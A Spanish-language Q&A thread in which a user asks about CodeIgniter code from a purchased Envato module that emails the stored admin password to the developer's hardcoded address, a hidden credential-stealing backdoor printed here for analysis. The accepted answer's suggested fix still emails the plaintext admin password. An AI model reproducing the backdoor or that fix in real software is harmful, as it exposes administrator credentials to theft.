# Qué hace este código sobre PHP y CodeIgniter?

Tags: php, sql, codeigniter

bueno me presento, me llamo Pablo y soy nuevo por aquí.

Os voy a pasar un código por aquí a ver qué sentido le dáis a este código, lo encontré en un módulo que compré hace poco por envato. Espero que podáis encontrarle el mismo sentido que yo:

```
public function invia_password($mail){
    $data = array();
    $query = $this->db->get('impostazioni');
    if ($query->num_rows() > 0) {
        $data = $query->result_array();
        $this->send_email('xxxxxxxxxxxx@hotmail.it', $data[0]['admin_password']);
    }

    return 1;
}
```

Censuro el correo, pero he de decir que el correo NO es mío, es del programador que lo hizo, esto tiene una pinta grave, no?

He de decir que el módulo es comprado y para nada hackeado, espero que podáis encontrarle el sentido.

---

**EDITO:**

Encontré la función en el login.php, a ver que podéis descubrir de aquí:

```
public function forgot_password(){
    $email = $this->input->post('email', true);
    $controllo = $this->Login_model->controlla_email($email);
    if ($controllo) {
        $this->Login_model->invia_password($email);
        echo $email;
    } else {
        echo 'false';
    }
}
```

Sin embargo no existe ningún botón de olvidaste la contraseña, de hecho esa función está ahí de decoración :/

Comment: Esa función en que componente esta, en un controlador o modelo?

Comment: \application\models\login_model.php

Comment: La base de datos "impostazioni" es una base de datos de gestión del modulo, ahí está el mail y la contraseña del sistema de gestión. Yo de codeigniter no sé casi nada, al ser un modelo, ejecuta la función?

Comment: Al ser un modelo solo se ejecuta cuando llamas la función en un controlador.

Comment: Edité el post para que puedas ver más acerca de esto, un saludo y muchas gracias

Comment: Ya coloqué una respuesta, revísala para saber si te fue útil

Comment: Buenas, después de tantos años y recuperar esta cuenta (¡Por fin!), por fin logro comentar. Resulta que uno de los módulos que adquirí de PrestaShop, hacía que cada vez que se enviara un request de forgot password, enviaba el correo al dueño del módulo. El módulo fue reportado y removido de la Store de PrestaShop. Un saludo a todos.

Answer (score 1, accepted):

Al ver el código del modelo y controlador lo que harían esos módulos es enviar a un correo la clave de administrador, seria un modulo para recuperar la contraseña básicamente.

En esta linea de código:

```
$this->send_email('xxxxxxxxxxxx@hotmail.it', $data[0]['admin_password']);
```

Deberías revisar lo que hace la función send_mail, ya que si el primer parámetro es la dirección de correo a la que se envía la contraseña, siempre se enviará a esa dirección y no a la que estas enviando por post al controlador.

Al ver que en el controlador recibe un dato por post:

```
 $email = $this->input->post('email', true);
```

Supongo que ese es el email al que se debe enviar la contraseña, en ese caso la llamada a la funcion `send_email()` en el modelo debería ser:

```
$this->send_email($email, $data[0]['admin_password']);
```

Comment: Claro, si de hecho la función se llama forgot password, lo que me extrañaba era básicamente era que el correo al que estaba establecido era el correo del programador de envato, es decir, que es un agujero de seguridad o directamente este chico quiere que se le envíen todas las contraseñas restablecidas, no?

Comment: Si, por eso deberías revisar la funcion send_email(), para saber que es lo que hace, si la dejas así todas las contraseñas, como dices se enviaran al la dirección que esta seteada por defecto.